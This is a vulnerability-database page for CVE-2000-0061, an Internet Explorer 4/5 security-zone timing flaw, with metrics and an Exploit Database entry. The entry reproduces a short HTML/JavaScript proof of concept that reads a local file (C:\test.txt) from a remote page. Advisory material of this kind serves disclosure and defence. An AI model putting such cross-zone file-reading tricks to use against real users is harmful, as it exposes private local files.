CVE-2000-0061 : Detail

CVE-2000-0061

1.17%V3
Network
2000-02-04
04h00 +00:00
2004-04-06
07h00 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Internet Explorer 5 does not modify the security zone for a document that is being loaded into a window until after the document has been loaded, which could allow remote attackers to execute Javascript in a different security context while the document is loading.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 10 AV:N/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 19719

Publication date : 2000-01-06 23h00 +00:00
Author : Georgi Guninski
EDB Verified : Yes

Microsoft Internet Explorer 4.0 for Windows 3.1/Windows 95,Internet Explorer 5.0 for Windows 2000/Windows 95/Windows 98/Windows NT 4,Internet Explorer 5.5 preview,Internet Explorer 4.0.1 for Windows 98/Windows NT 4.0,Internet Explorer 5.0.1 Security Zone Settings Lag Vulnerability source: https://www.securityfocus.com/bid/923/info When a new document is loaded into an IE window, IE will not update the Security Zone settings for that window until the new document is completely loaded. This means that if a local document is loaded, and then a large remote document is loaded that has JavaScript at the very beginning, the JavaScript may load and execute before the Security Zone settings are updated. This could lead to remote and untrusted JavaScript running as local trusted code, with full access to local files, cookies, etc. -----------------img2main.html--------------------------------------- <A HREF="img2.html" TARGET="victim">link</A> <SCRIPT> alert("Create a short text file C:\\test.txt and it will be read and shown in a message box"); a=window.open("file://c:/test.txt","victim"); setTimeout("document.links[0].click()",2000); </SCRIPT> --------------------------------------------------------------------- ----------------img2.html-------------------------------------------- <HTML> <IMG SRC="javascript:a=window.open('javascript:alert(\'Here is your file: \'+opener.document.body.innerText)');alert('Just an alert, but is necessary. Wait a little.')"> </HTML> ---------------------------------------------------------------------

Products Mentioned

Configuraton 0

Microsoft>>Internet_explorer >> Version 4.0

Microsoft>>Internet_explorer >> Version 4.0.1

Microsoft>>Internet_explorer >> Version 5.0

Microsoft>>Internet_explorer >> Version 5.01

Microsoft>>Internet_explorer >> Version 5.5

References

http://www.securityfocus.com/bid/923
Tags : vdb-entry, x_refsource_BID